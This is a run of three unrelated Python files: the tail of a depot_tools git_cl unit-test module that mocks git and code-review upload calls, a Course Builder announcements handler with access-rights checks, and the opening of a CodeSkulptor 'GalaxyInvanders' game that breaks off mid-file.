((['git', 'symbolic-ref', 'HEAD'],), 'master'), similarity_call, ((['git', 'symbolic-ref', 'HEAD'],), 'master'), find_copies_call, ((['git', 'update-index', '--refresh', '-q'],), ''), ((['git', 'diff-index', '--name-status', 'HEAD'],), ''), ((['git', 'symbolic-ref', 'HEAD'],), 'master'), ((['git', 'config', 'branch.master.merge'],), 'master'), ((['git', 'config', 'branch.master.remote'],), 'origin'), ((['get_or_create_merge_base', 'master', 'master'],), 'fake_ancestor_sha'), ] + cls._git_sanity_checks('fake_ancestor_sha', 'master') + [ ((['git', 'rev-parse', '--show-cdup'],), ''), ((['git', 'rev-parse', 'HEAD'],), '12345'), ((['git', 'diff', '--name-status', '--no-renames', '-r', 'fake_ancestor_sha...', '.'],), 'M\t.gitignore\n'), ((['git', 'config', 'branch.master.rietveldissue'],), ''), ((['git', 'config', 'branch.master.rietveldpatchset'],), ''), ((['git', 'log', '--pretty=format:%s%n%n%b', 'fake_ancestor_sha...'],), 'foo'), ((['git', 'config', 'user.email'],), 'me@example.com'), stat_call, ((['git', 'config', 'gerrit.host'],), ''), ((['git', 'log', '--pretty=format:%s\n\n%b', 'fake_ancestor_sha..HEAD'],), 'desc\n'), ((['git', 'config', 'rietveld.bug-prefix'],), ''), ] @classmethod def _git_upload_no_rev_calls(cls): return [ ((['git', 'config', 'core.editor'],), ''), ] @classmethod def _git_upload_calls(cls, private): if private: cc_call = [] private_call = [] else: cc_call = [((['git', 'config', 'rietveld.cc'],), '')] private_call = [ ((['git', 'config', 'rietveld.private'],), '')] return [ ((['git', 'config', 'core.editor'],), ''), ] + cc_call + private_call + [ ((['git', 'config', 'branch.master.base-url'],), ''), ((['git', 'config', '--local', '--get-regexp', '^svn-remote\\.'],), (('', None), 0)), ((['git', 'rev-parse', '--show-cdup'],), ''), ((['git', 'svn', 'info'],), ''), ((['git', 'config', 'rietveld.project'],), ''), ((['git', 'config', 'branch.master.rietveldissue', '1'],), ''), ((['git', 'config', 'branch.master.rietveldserver', 'https://codereview.example.com'],), ''), ((['git', 'config', 
'branch.master.rietveldpatchset', '2'],), ''), ((['git', 'rev-parse', 'HEAD'],), 'hash'), ((['git', 'symbolic-ref', 'HEAD'],), 'hash'), ((['git', 'config', 'branch.hash.last-upload-hash', 'hash'],), ''), ] @staticmethod def _git_sanity_checks(diff_base, working_branch): fake_ancestor = 'fake_ancestor' fake_cl = 'fake_cl_for_patch' return [ # Calls to verify branch point is ancestor ((['git', 'rev-parse', '--verify', diff_base],), fake_ancestor), ((['git', 'merge-base', fake_ancestor, 'HEAD'],), fake_ancestor), ((['git', 'rev-list', '^' + fake_ancestor, 'HEAD'],), fake_cl), # Mock a config miss (error code 1) ((['git', 'config', 'gitcl.remotebranch'],), (('', None), 1)), # Call to GetRemoteBranch() ((['git', 'config', 'branch.%s.merge' % working_branch],), 'refs/heads/master'), ((['git', 'config', 'branch.%s.remote' % working_branch],), 'origin'), ((['git', 'rev-list', '^' + fake_ancestor, 'refs/remotes/origin/master'],), ''), ] @classmethod def _dcommit_calls_1(cls): return [ ((['git', 'config', '--local', '--get-regexp', '^svn-remote\\.'],), ((('svn-remote.svn.url svn://svn.chromium.org/chrome\n' 'svn-remote.svn.fetch trunk/src:refs/remotes/origin/master'), None), 0)), ((['git', 'config', 'rietveld.autoupdate'],), ''), ((['git', 'config', 'rietveld.server'],), 'codereview.example.com'), ((['git', 'symbolic-ref', 'HEAD'],), 'refs/heads/working'), ((['git', 'config', '--int', '--get', 'branch.working.git-cl-similarity'],), ''), ((['git', 'symbolic-ref', 'HEAD'],), 'refs/heads/working'), ((['git', 'config', '--int', '--get', 'branch.working.git-find-copies'],), ''), ((['git', 'symbolic-ref', 'HEAD'],), 'refs/heads/working'), ((['git', 'config', 'branch.working.merge'],), 'refs/heads/master'), ((['git', 'config', 'branch.working.remote'],), 'origin'), ((['git', 'config', 'branch.working.merge'],), 'refs/heads/master'), ((['git', 'config', 'branch.working.remote'],), 'origin'), ((['git', 'rev-list', '--merges', '--grep=^SVN changes up to revision [0-9]*$', 'refs/remotes/origin/master^!'],), ''), ((['git', 'update-index', '--refresh', '-q'],), ''), ((['git', 'diff-index', '--name-status', 'HEAD'],), ''), ((['git', 'rev-list', '^refs/heads/working', 'refs/remotes/origin/master'],), ''), ((['git', 'log', '--grep=^git-svn-id:', '-1', '--pretty=format:%H'],), '3fc18b62c4966193eb435baabe2d18a3810ec82e'), ((['git', 'rev-list', '^3fc18b62c4966193eb435baabe2d18a3810ec82e', 'refs/remotes/origin/master'],), ''), ((['git', 'merge-base', 'refs/remotes/origin/master', 'HEAD'],), 'fake_ancestor_sha'), ] @classmethod def _dcommit_calls_normal(cls): return [ ((['git', 'rev-parse', '--show-cdup'],), ''), ((['git', 'rev-parse', 'HEAD'],), '00ff397798ea57439712ed7e04ab96e13969ef40'), ((['git', 'diff', '--name-status', '--no-renames', '-r', 'fake_ancestor_sha...', '.'],), 'M\tPRESUBMIT.py'), ((['git', 'config', 'branch.working.rietveldissue'],), '12345'), ((['git', 'config', 'branch.working.rietveldpatchset'],), '31137'), ((['git', 'config', 'branch.working.rietveldserver'],), 'codereview.example.com'), ((['git', 'config', 'user.email'],), 'author@example.com'), ((['git', 'config', 'rietveld.tree-status-url'],), ''), ] @classmethod def _dcommit_calls_bypassed(cls): return [ ((['git', 'config', 'branch.working.rietveldissue'],), '12345'), ((['git', 'config', 'branch.working.rietveldserver'],), 'codereview.example.com'), ((['git', 'config', 'rietveld.tree-status-url'],), ''), (('GitClHooksBypassedCommit', 'Issue https://codereview.example.com/12345 bypassed hook when ' 'committing (tree status was "unset")'), None), 
] @classmethod def _dcommit_calls_3(cls): return [ ((['git', 'diff', '--no-ext-diff', '--stat', '--find-copies-harder', '-l100000', '-C50', 'fake_ancestor_sha', 'refs/heads/working'],), (' PRESUBMIT.py | 2 +-\n' ' 1 files changed, 1 insertions(+), 1 deletions(-)\n')), (('About to commit; enter to confirm.',), None), ((['git', 'show-ref', '--quiet', '--verify', 'refs/heads/git-cl-commit'],), (('', None), 0)), ((['git', 'branch', '-D', 'git-cl-commit'],), ''), ((['git', 'show-ref', '--quiet', '--verify', 'refs/heads/git-cl-cherry-pick'],), ''), ((['git', 'rev-parse', '--show-cdup'],), '\n'), ((['git', 'checkout', '-q', '-b', 'git-cl-commit'],), ''), ((['git', 'reset', '--soft', 'fake_ancestor_sha'],), ''), ((['git', 'commit', '-m', 'Issue: 12345\n\nR=john@chromium.org\n\n' 'Review URL: https://codereview.example.com/12345'],), ''), ((['git', 'svn', 'dcommit', '-C50', '--no-rebase', '--rmdir'],), (('', None), 0)), ((['git', 'checkout', '-q', 'working'],), ''), ((['git', 'branch', '-D', 'git-cl-commit'],), ''), ] @staticmethod def _cmd_line(description, args, similarity, find_copies, private): """Returns the upload command line passed to upload.RealMain().""" return [ 'upload', '--assume_yes', '--server', 'https://codereview.example.com', '--message', description ] + args + [ '--cc', 'joe@example.com', ] + (['--private'] if private else []) + [ '--git_similarity', similarity or '50' ] + (['--git_no_find_copies'] if find_copies == False else []) + [ 'fake_ancestor_sha', 'HEAD' ] def _run_reviewer_test( self, upload_args, expected_description, returned_description, final_description, reviewers, private=False): """Generic reviewer test framework.""" try: similarity = upload_args[upload_args.index('--similarity')+1] except ValueError: similarity = None if '--find-copies' in upload_args: find_copies = True elif '--no-find-copies' in upload_args: find_copies = False else: find_copies = None private = '--private' in upload_args self.calls = self._upload_calls(similarity, find_copies, private) def RunEditor(desc, _, **kwargs): self.assertEquals( '# Enter a description of the change.\n' '# This will be displayed on the codereview site.\n' '# The first line will also be used as the subject of the review.\n' '#--------------------This line is 72 characters long' '--------------------\n' + expected_description, desc) return returned_description self.mock(git_cl.gclient_utils, 'RunEditor', RunEditor) def check_upload(args): cmd_line = self._cmd_line(final_description, reviewers, similarity, find_copies, private) self.assertEquals(cmd_line, args) return 1, 2 self.mock(git_cl.upload, 'RealMain', check_upload) git_cl.main(['upload'] + upload_args) def test_no_reviewer(self): self._run_reviewer_test( [], 'desc\n\nBUG=', '# Blah blah comment.\ndesc\n\nBUG=', 'desc\n\nBUG=', []) def test_keep_similarity(self): self._run_reviewer_test( ['--similarity', '70'], 'desc\n\nBUG=', '# Blah blah comment.\ndesc\n\nBUG=', 'desc\n\nBUG=', []) def test_keep_find_copies(self): self._run_reviewer_test( ['--no-find-copies'], 'desc\n\nBUG=', '# Blah blah comment.\ndesc\n\nBUG=\n', 'desc\n\nBUG=', []) def test_private(self): self._run_reviewer_test( ['--private'], 'desc\n\nBUG=', '# Blah blah comment.\ndesc\n\nBUG=\n', 'desc\n\nBUG=', []) def test_reviewers_cmd_line(self): # Reviewer is passed as-is description = 'desc\n\nR=foo@example.com\nBUG=' self._run_reviewer_test( ['-r' 'foo@example.com'], description, '\n%s\n' % description, description, ['--reviewers=foo@example.com']) def test_reviewer_tbr_overriden(self): # Reviewer is 
overriden with TBR # Also verifies the regexp work without a trailing LF description = 'Foo Bar\n\nTBR=reviewer@example.com' self._run_reviewer_test( ['-r' 'foo@example.com'], 'desc\n\nR=foo@example.com\nBUG=', description.strip('\n'), description, ['--reviewers=reviewer@example.com']) def test_reviewer_multiple(self): # Handles multiple R= or TBR= lines. description = ( 'Foo Bar\nTBR=reviewer@example.com\nBUG=\nR=another@example.com') self._run_reviewer_test( [], 'desc\n\nBUG=', description, description, ['--reviewers=another@example.com,reviewer@example.com']) def test_reviewer_send_mail(self): # --send-mail can be used without -r if R= is used description = 'Foo Bar\nR=reviewer@example.com' self._run_reviewer_test( ['--send-mail'], 'desc\n\nBUG=', description.strip('\n'), description, ['--reviewers=reviewer@example.com', '--send_mail']) def test_reviewer_send_mail_no_rev(self): # Fails without a reviewer. stdout = StringIO.StringIO() stderr = StringIO.StringIO() try: self.calls = self._upload_no_rev_calls(None, None) def RunEditor(desc, _, **kwargs): return desc self.mock(git_cl.gclient_utils, 'RunEditor', RunEditor) self.mock(sys, 'stdout', stdout) self.mock(sys, 'stderr', stderr) git_cl.main(['upload', '--send-mail']) self.fail() except SystemExit: self.assertEqual( 'Using 50% similarity for rename/copy detection. Override with ' '--similarity.\n', stdout.getvalue()) self.assertEqual( 'Must specify reviewers to send email.\n', stderr.getvalue()) def test_dcommit(self): self.calls = ( self._dcommit_calls_1() + self._git_sanity_checks('fake_ancestor_sha', 'working') + self._dcommit_calls_normal() + self._dcommit_calls_3()) git_cl.main(['dcommit']) def test_dcommit_bypass_hooks(self): self.calls = ( self._dcommit_calls_1() + self._dcommit_calls_bypassed() + self._dcommit_calls_3()) git_cl.main(['dcommit', '--bypass-hooks']) @classmethod def _gerrit_base_calls(cls): return [ ((['git', 'config', 'rietveld.autoupdate'],), ''), ((['git', 'config', 'rietveld.server'],), 'codereview.example.com'), ((['git', 'symbolic-ref', 'HEAD'],), 'master'), ((['git', 'config', '--int', '--get', 'branch.master.git-cl-similarity'],), ''), ((['git', 'symbolic-ref', 'HEAD'],), 'master'), ((['git', 'config', '--int', '--get', 'branch.master.git-find-copies'],), ''), ((['git', 'update-index', '--refresh', '-q'],), ''), ((['git', 'diff-index', '--name-status', 'HEAD'],), ''), ((['git', 'symbolic-ref', 'HEAD'],), 'master'), ((['git', 'config', 'branch.master.merge'],), 'master'), ((['git', 'config', 'branch.master.remote'],), 'origin'), ((['get_or_create_merge_base', 'master', 'master'],), 'fake_ancestor_sha'), ] + cls._git_sanity_checks('fake_ancestor_sha', 'master') + [ ((['git', 'rev-parse', '--show-cdup'],), ''), ((['git', 'rev-parse', 'HEAD'],), '12345'), ((['git', 'diff', '--name-status', '--no-renames', '-r', 'fake_ancestor_sha...', '.'],), 'M\t.gitignore\n'), ((['git', 'config', 'branch.master.rietveldissue'],), ''), ((['git', 'config', 'branch.master.rietveldpatchset'],), ''), ((['git', 'log', '--pretty=format:%s%n%n%b', 'fake_ancestor_sha...'],), 'foo'), ((['git', 'config', 'user.email'],), 'me@example.com'), ((['git', 'diff', '--no-ext-diff', '--stat', '--find-copies-harder', '-l100000', '-C50', 'fake_ancestor_sha', 'HEAD'],), '+dat'), ] @staticmethod def _gerrit_upload_calls(description, reviewers): calls = [ ((['git', 'config', 'gerrit.host'],), 'gerrit.example.com'), ((['git', 'log', '--pretty=format:%s\n\n%b', 'fake_ancestor_sha..HEAD'],), description) ] if git_cl.CHANGE_ID not in description: calls 
+= [ ((['git', 'log', '--pretty=format:%s\n\n%b', 'fake_ancestor_sha..HEAD'],), description), ((['git', 'commit', '--amend', '-m', description],), ''), ((['git', 'log', '--pretty=format:%s\n\n%b', 'fake_ancestor_sha..HEAD'],), description) ] calls += [ ((['git', 'rev-list', 'origin/master..'],), ''), ((['git', 'config', 'rietveld.cc'],), '') ] receive_pack = '--receive-pack=git receive-pack ' receive_pack += '--cc=joe@example.com' # from watch list if reviewers: receive_pack += ' ' receive_pack += ' '.join( '--reviewer=' + email for email in sorted(reviewers)) receive_pack += '' calls += [ ((['git', 'push', receive_pack, 'origin', 'HEAD:refs/for/master'],), '') ] return calls def _run_gerrit_upload_test( self, upload_args, description, reviewers): """Generic gerrit upload test framework.""" self.calls = self._gerrit_base_calls() self.calls += self._gerrit_upload_calls(description, reviewers) git_cl.main(['upload'] + upload_args) def test_gerrit_upload_without_change_id(self): self._run_gerrit_upload_test( [], 'desc\n\nBUG=\n', []) def test_gerrit_no_reviewer(self): self._run_gerrit_upload_test( [], 'desc\n\nBUG=\nChange-Id:123456789\n', []) def test_gerrit_reviewers_cmd_line(self): self._run_gerrit_upload_test( ['-r', 'foo@example.com'], 'desc\n\nBUG=\nChange-Id:123456789', ['foo@example.com']) def test_gerrit_reviewer_multiple(self): self._run_gerrit_upload_test( [], 'desc\nTBR=reviewer@example.com\nBUG=\nR=another@example.com\n' 'Change-Id:123456789\n', ['reviewer@example.com', 'another@example.com']) def test_config_gerrit_download_hook(self): self.mock(git_cl, 'FindCodereviewSettingsFile', CodereviewSettingsFileMock) def ParseCodereviewSettingsContent(content): keyvals = {} keyvals['CODE_REVIEW_SERVER'] = 'gerrit.chromium.org' keyvals['GERRIT_HOST'] = 'gerrit.chromium.org' keyvals['GERRIT_PORT'] = '29418' return keyvals self.mock(git_cl.gclient_utils, 'ParseCodereviewSettingsContent', ParseCodereviewSettingsContent) self.mock(git_cl.os, 'access', self._mocked_call) self.mock(git_cl.os, 'chmod', self._mocked_call) src_dir = os.path.join(os.path.sep, 'usr', 'local', 'src') def AbsPath(path): if not path.startswith(os.path.sep): return os.path.join(src_dir, path) return path self.mock(git_cl.os.path, 'abspath', AbsPath) commit_msg_path = os.path.join(src_dir, '.git', 'hooks', 'commit-msg') def Exists(path): if path == commit_msg_path: return False # others paths, such as /usr/share/locale/.... 
return True self.mock(git_cl.os.path, 'exists', Exists) self.mock(git_cl, 'urlretrieve', self._mocked_call) self.mock(git_cl, 'hasSheBang', self._mocked_call) self.calls = [ ((['git', 'config', 'rietveld.autoupdate'],), ''), ((['git', 'config', 'rietveld.server', 'gerrit.chromium.org'],), ''), ((['git', 'config', '--unset-all', 'rietveld.cc'],), ''), ((['git', 'config', '--unset-all', 'rietveld.private'],), ''), ((['git', 'config', '--unset-all', 'rietveld.tree-status-url'],), ''), ((['git', 'config', '--unset-all', 'rietveld.viewvc-url'],), ''), ((['git', 'config', '--unset-all', 'rietveld.bug-prefix'],), ''), ((['git', 'config', '--unset-all', 'rietveld.cpplint-regex'],), ''), ((['git', 'config', '--unset-all', 'rietveld.cpplint-ignore-regex'],), ''), ((['git', 'config', '--unset-all', 'rietveld.project'],), ''), ((['git', 'config', 'gerrit.host', 'gerrit.chromium.org'],), ''), # DownloadHooks(False) ((['git', 'config', 'gerrit.host'],), 'gerrit.chromium.org'), ((['git', 'rev-parse', '--show-cdup'],), ''), ((commit_msg_path, os.X_OK,), False), (('https://gerrit-review.googlesource.com/tools/hooks/commit-msg', commit_msg_path,), ''), ((commit_msg_path,), True), ((commit_msg_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR,), ''), # GetCodereviewSettingsInteractively ((['git', 'config', 'rietveld.server'],), 'gerrit.chromium.org'), (('Rietveld server (host[:port]) [https://gerrit.chromium.org]:',), ''), ((['git', 'config', 'rietveld.cc'],), ''), (('CC list:',), ''), ((['git', 'config', 'rietveld.private'],), ''), (('Private flag (rietveld only):',), ''), ((['git', 'config', 'rietveld.tree-status-url'],), ''), (('Tree status URL:',), ''), ((['git', 'config', 'rietveld.viewvc-url'],), ''), (('ViewVC URL:',), ''), # DownloadHooks(True) ((['git', 'config', 'rietveld.bug-prefix'],), ''), (('Bug Prefix:',), ''), ((commit_msg_path, os.X_OK,), True), ] git_cl.main(['config']) def test_update_reviewers(self): data = [ ('foo', [], 'foo'), ('foo\nR=xx', [], 'foo\nR=xx'), ('foo\nTBR=xx', [], 'foo\nTBR=xx'), ('foo', ['a@c'], 'foo\n\nR=a@c'), ('foo\nR=xx', ['a@c'], 'foo\n\nR=a@c, xx'), ('foo\nTBR=xx', ['a@c'], 'foo\n\nR=a@c\nTBR=xx'), ('foo\nTBR=xx\nR=yy', ['a@c'], 'foo\n\nR=a@c, yy\nTBR=xx'), ('foo\nBUG=', ['a@c'], 'foo\nBUG=\nR=a@c'), ('foo\nR=xx\nTBR=yy\nR=bar', ['a@c'], 'foo\n\nR=a@c, xx, bar\nTBR=yy'), ('foo', ['a@c', 'b@c'], 'foo\n\nR=a@c, b@c'), ('foo\nBar\n\nR=\nBUG=', ['c@c'], 'foo\nBar\n\nR=c@c\nBUG='), ('foo\nBar\n\nR=\nBUG=\nR=', ['c@c'], 'foo\nBar\n\nR=c@c\nBUG='), # Same as the line before, but full of whitespaces. ( 'foo\nBar\n\n R = \n BUG = \n R = ', ['c@c'], 'foo\nBar\n\nR=c@c\n BUG =', ), # Whitespaces aren't interpreted as new lines. 
('foo BUG=allo R=joe ', ['c@c'], 'foo BUG=allo R=joe\n\nR=c@c'), ] expected = [i[2] for i in data] actual = [] for orig, reviewers, _expected in data: obj = git_cl.ChangeDescription(orig) obj.update_reviewers(reviewers) actual.append(obj.description) self.assertEqual(expected, actual) def test_trybots_from_PRESUBMIT(self): TEST_MASTER = 'testMaster' TEST_BUILDER = 'testBuilder' MASTERS = {TEST_MASTER:{TEST_BUILDER:['a']}} self.mock(presubmit_support, 'DoGetTryMasters', lambda *args: MASTERS) change_mock = ChangeMock() changelist_mock = ChangelistMock(change_mock) self.mock(git_cl, 'is_dirty_git_tree', lambda x: False) self.mock(git_cl, 'print_stats', lambda *arg: True) self.mock(git_cl, 'Changelist', lambda *args: changelist_mock) self.mock(git_cl, 'CreateDescriptionFromLog', lambda arg: 'Commit message') self.mock(git_cl.ChangeDescription, 'prompt', lambda self: None) self.calls = [ ((['git', 'config', 'rietveld.autoupdate',],), ''), ((['git', 'config', 'gerrit.host',],), ''), ((['git', 'rev-parse', '--show-cdup',],), ''), ((['git', 'config', 'rietveld.private',],), ''), ((['git', 'config', '--local', '--get-regexp', '^svn-remote\\.'],), ''), ((['git', 'config', 'rietveld.project',],), ''), ((['git', 'rev-parse', 'HEAD',],), ''), ] stored_description = [] def check_upload(args): i = 0 for arg in args: if arg == '--message': break i += 1 self.assertTrue(i < len(args)) stored_description.append(args[i+1]) return 1, 2 self.mock(git_cl.upload, 'RealMain', check_upload) git_cl.main(['upload', '--bypass-hooks', '--auto-bots']) found = re.search("CQ_TRYBOTS=(.*?)$", stored_description[0]) self.assertTrue(found) self.assertEqual(found.group(1), '%s:%s' % (TEST_MASTER, TEST_BUILDER)) class ChangelistMock(object): # Disable "Method could be a function" # pylint: disable=R0201 def __init__(self, change_mock): self.change_mock = change_mock def GetChange(self, *args): return self.change_mock def GetIssue(self): return None def GetBranch(self): return [] def GetCommonAncestorWithUpstream(self): return [] def GetCCList(self): return [] def GetGitBaseUrlFromConfig(self): return '' def GetRemoteUrl(self): return '' def GetRietveldServer(self): return None def SetWatchers(self, *args): pass def SetIssue(self, issue): pass def SetPatchset(self, issue): pass class ChangeMock(object): # Disable "Method could be a function" # pylint: disable=R0201 def __init__(self): self.stored_description = None def SetDescriptionText(self, desc): self.stored_description = desc def FullDescriptionText(self): return 'HIHI TEST DESCRIPTION' def RepositoryRoot(self): return [] def AffectedFiles(self): return [] def LocalPaths(self): return None if __name__ == '__main__': git_cl.logging.basicConfig( level=git_cl.logging.DEBUG if '-v' in sys.argv else git_cl.logging.ERROR) unittest.main()
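# Illustrative sketch (not from depot_tools): test_trybots_from_PRESUBMIT
# above pulls the CQ_TRYBOTS line back out of the uploaded description with a
# regex.  A minimal standalone version of that extraction, using a made-up
# description string, looks like this:
import re

_description = 'Commit message\n\nCQ_TRYBOTS=testMaster:testBuilder'
_found = re.search("CQ_TRYBOTS=(.*?)$", _description)
assert _found and _found.group(1) == 'testMaster:testBuilder'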
# Copyright 2012 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS-IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Classes and methods to create and manage Announcements.""" __author__ = 'Saifu Angto (saifu@google.com)' import datetime import json import urllib from controllers.utils import BaseHandler from controllers.utils import BaseRESTHandler from controllers.utils import ReflectiveRequestHandler from controllers.utils import XsrfTokenManager from models import entities from models import roles from models.models import MemcacheManager import models.transforms as transforms import modules.announcements.samples as samples from modules.oeditor import oeditor from google.appengine.ext import db import markdown # TODO(psimakov): we should really use an ordered dictionary, not plain text; it # can't be just a normal dict because a dict iterates its items in undefined # order; thus when we render a dict to JSON an order of fields will not match # what we specify here; the final editor will also show the fields in an # undefined order; for now we use the raw JSON, rather than the dict, but will # move to an ordered dict later SCHEMA_JSON = """ { "id": "Announcement Entity", "type": "object", "description": "Announcement", "properties": { "key" : {"type": "string"}, "title": {"optional": true, "type": "string"}, "date": {"optional": true, "type": "date"}, "is_html": {"type": "boolean"}, "html": {"optional": true, "type": "text"}, "is_draft": {"type": "boolean"} } } """ SCHEMA_DICT = json.loads(SCHEMA_JSON) # inputex specific schema annotations to control editor look and feel SCHEMA_ANNOTATIONS_DICT = [ (['title'], 'Announcement'), (['properties', 'key', '_inputex'], { 'label': 'ID', '_type': 'uneditable'}), (['properties', 'title', '_inputex'], {'label': 'Title'}), (['properties', 'date', '_inputex'], { 'label': 'Date', '_type': 'date', 'dateFormat': 'Y/m/d', 'valueFormat': 'Y/m/d'}), oeditor.create_bool_select_annotation( ['properties', 'is_html'], 'Type', 'Html', 'WikiText'), (['properties', 'html', '_inputex'], {'label': 'Body', '_type': 'text'}), oeditor.create_bool_select_annotation( ['properties', 'is_draft'], 'Status', 'Draft', 'Published')] class AnnouncementsRights(object): """Manages view/edit rights for announcements.""" @classmethod def can_view(cls, unused_handler): return True @classmethod def can_edit(cls, handler): return roles.Roles.is_course_admin(handler.app_context) @classmethod def can_delete(cls, handler): return cls.can_edit(handler) @classmethod def can_add(cls, handler): return cls.can_edit(handler) @classmethod def apply_rights(cls, handler, items): """Filter out items that current user can't see.""" if AnnouncementsRights.can_edit(handler): return items allowed = [] for item in items: if not item.is_draft: allowed.append(item) return allowed class AnnouncementsHandler(BaseHandler, ReflectiveRequestHandler): """Handler for announcements.""" default_action = 'list' get_actions = [default_action, 'edit'] post_actions = ['add', 'delete'] @classmethod def get_child_routes(cls): """Add child handlers 
for REST.""" return [('/rest/announcements/item', AnnouncementsItemRESTHandler)] def get_action_url(self, action, key=None): args = {'action': action} if key: args['key'] = key return self.canonicalize_url( '/announcements?%s' % urllib.urlencode(args)) def format_items_for_template(self, items): """Formats a list of entities into template values.""" template_items = [] for item in items: item = transforms.entity_to_dict(item) # add 'edit' actions if AnnouncementsRights.can_edit(self): item['edit_action'] = self.get_action_url('edit', item['key']) item['delete_xsrf_token'] = self.create_xsrf_token('delete') item['delete_action'] = self.get_action_url( 'delete', item['key']) template_items.append(item) output = {} output['children'] = template_items # add 'add' action if AnnouncementsRights.can_edit(self): output['add_xsrf_token'] = self.create_xsrf_token('add') output['add_action'] = self.get_action_url('add') return output def put_sample_announcements(self): """Loads sample data into a database.""" items = [] for item in samples.SAMPLE_ANNOUNCEMENTS: entity = AnnouncementEntity() transforms.dict_to_entity(entity, item) entity.put() items.append(entity) return items def get_list(self): """Shows a list of announcements.""" if not self.personalize_page_and_get_enrolled(): return items = AnnouncementEntity.get_announcements() if not items and AnnouncementsRights.can_edit(self): items = self.put_sample_announcements() items = AnnouncementsRights.apply_rights(self, items) # Text could be HTML or wiki text (markdown syntax). # Transform to HTML if it is wiki text. for item in items: if item.is_html == False: item.html = markdown.markdown(item.html) self.template_value['announcements'] = self.format_items_for_template( items) self.template_value['navbar'] = {'announcements': True} self.render('announcements.html') def get_edit(self): """Shows an editor for an announcement.""" if not AnnouncementsRights.can_edit(self): self.error(401) return key = self.request.get('key') exit_url = self.canonicalize_url( '/announcements#%s' % urllib.quote(key, safe='')) rest_url = self.canonicalize_url('/rest/announcements/item') form_html = oeditor.ObjectEditor.get_html_for( self, SCHEMA_JSON, SCHEMA_ANNOTATIONS_DICT, key, rest_url, exit_url) self.template_value['navbar'] = {'announcements': True} self.template_value['content'] = form_html self.render('bare.html') def post_delete(self): """Deletes an announcement.""" if not AnnouncementsRights.can_delete(self): self.error(401) return key = self.request.get('key') entity = AnnouncementEntity.get(key) if entity: entity.delete() self.redirect('/announcements') def post_add(self): """Adds a new announcement and redirects to an editor for it.""" if not AnnouncementsRights.can_add(self): self.error(401) return entity = AnnouncementEntity() entity.title = 'Sample Announcement' entity.date = datetime.datetime.now().date() entity.is_html = True entity.html = 'Here is my announcement!' 
entity.is_draft = True entity.put() self.redirect(self.get_action_url('edit', entity.key())) class AnnouncementsItemRESTHandler(BaseRESTHandler): """Provides REST API for an announcement.""" def get(self): """Handles REST GET verb and returns an object as JSON payload.""" key = self.request.get('key') try: entity = AnnouncementEntity.get(key) except db.BadKeyError: entity = None if not entity: transforms.send_json_response( self, 404, 'Object not found.', {'key': key}) return viewable = AnnouncementsRights.apply_rights(self, [entity]) if not viewable: transforms.send_json_response( self, 401, 'Access denied.', {'key': key}) return entity = viewable[0] json_payload = transforms.dict_to_json(transforms.entity_to_dict( entity), SCHEMA_DICT) transforms.send_json_response( self, 200, 'Success.', payload_dict=json_payload, xsrf_token=XsrfTokenManager.create_xsrf_token( 'announcement-put')) def put(self): """Handles REST PUT verb with JSON payload.""" request = json.loads(self.request.get('request')) key = request.get('key') if not self.assert_xsrf_token_or_fail( request, 'announcement-put', {'key': key}): return if not AnnouncementsRights.can_edit(self): transforms.send_json_response( self, 401, 'Access denied.', {'key': key}) return entity = AnnouncementEntity.get(key) if not entity: transforms.send_json_response( self, 404, 'Object not found.', {'key': key}) return payload = request.get('payload') transforms.dict_to_entity(entity, transforms.json_to_dict( json.loads(payload), SCHEMA_DICT)) entity.put() transforms.send_json_response(self, 200, 'Saved.') class AnnouncementEntity(entities.BaseEntity): """A class that represents a persistent database entity of announcement.""" title = db.StringProperty(indexed=False) date = db.DateProperty() is_html = db.BooleanProperty() html = db.TextProperty(indexed=False) is_draft = db.BooleanProperty() memcache_key = 'announcements' @classmethod def get_announcements(cls, allow_cached=True): items = MemcacheManager.get(cls.memcache_key) if not allow_cached or items is None: items = AnnouncementEntity.all().order('-date').fetch(1000) # TODO(psimakov): prepare to exceed 1MB max item size # read more here: http://stackoverflow.com # /questions/5081502/memcache-1-mb-limit-in-google-app-engine MemcacheManager.set(cls.memcache_key, items) return items def put(self): """Do the normal put() and also invalidate memcache.""" result = super(AnnouncementEntity, self).put() MemcacheManager.delete(self.memcache_key) return result def delete(self): """Do the normal delete() and invalidate memcache.""" super(AnnouncementEntity, self).delete() MemcacheManager.delete(self.memcache_key)
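# Sketch only (not part of the announcements module above): the TODO on
# SCHEMA_JSON notes that a plain dict would lose the field order the editor
# should display.  Assuming the rest of the code could accept a mapping, one
# way to keep that order while still parsing the raw JSON is an
# order-preserving hook:
import collections
import json

_ordered_schema = json.loads(SCHEMA_JSON,
                             object_pairs_hook=collections.OrderedDict)
# _ordered_schema['properties'] now iterates key, title, date, is_html, html,
# is_draft in exactly the order they appear in SCHEMA_JSON.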
# Simple implementation of GalaxyInvanders game # Rohan Roy (India) - 3 Nov 2013 # www.codeskulptor.org/#user23_fTVPDKIDhRdCfUp VER = "1.0" # "add various aliens" import simplegui, math, random, time #Global const FIELD_WIDTH = 850 FIELD_HEIGHT = 500 TOP_MARGIN = 75 LEFT_MARGIN = 25 ALIEN_WIDTH = 48 ALIEN_HEIGHT = 55 PLAYER_SPEED = 10 BULLET_SPEED = 10 BULLET_POWER = 1 BONUS_SPEED = 10 ALIEN_SPEED = [3, 5] # Images: pImage = simplegui.load_image('https://dl.dropbox.com/s/zhnjucatewcmfs4/player.png') aImages = [] for i in range(7): aImages.append([]) aImages[0].append(simplegui.load_image('https://dl.dropbox.com/s/0cck7w6r0mt8pzz/alien_1_1.png')) aImages[0].append(simplegui.load_image('https://dl.dropbox.com/s/j0kubnhzajbdngu/alien_1_2.png')) aImages[0].append(simplegui.load_image('https://dl.dropbox.com/s/zkeu6hqh9bakj25/alien_1_3.png')) aImages[1].append(simplegui.load_image('https://dl.dropbox.com/s/e75mkcylat70lnd/alien_2_1.png')) aImages[1].append(simplegui.load_image('https://dl.dropbox.com/s/pgjvaxg0z6rhco9/alien_2_2.png')) aImages[1].append(simplegui.load_image('https://dl.dropbox.com/s/en0hycfsi3cuzuo/alien_2_3.png')) aImages[2].append(simplegui.load_image('https://dl.dropbox.com/s/fu9weoll70acs8f/alien_3_1.png')) 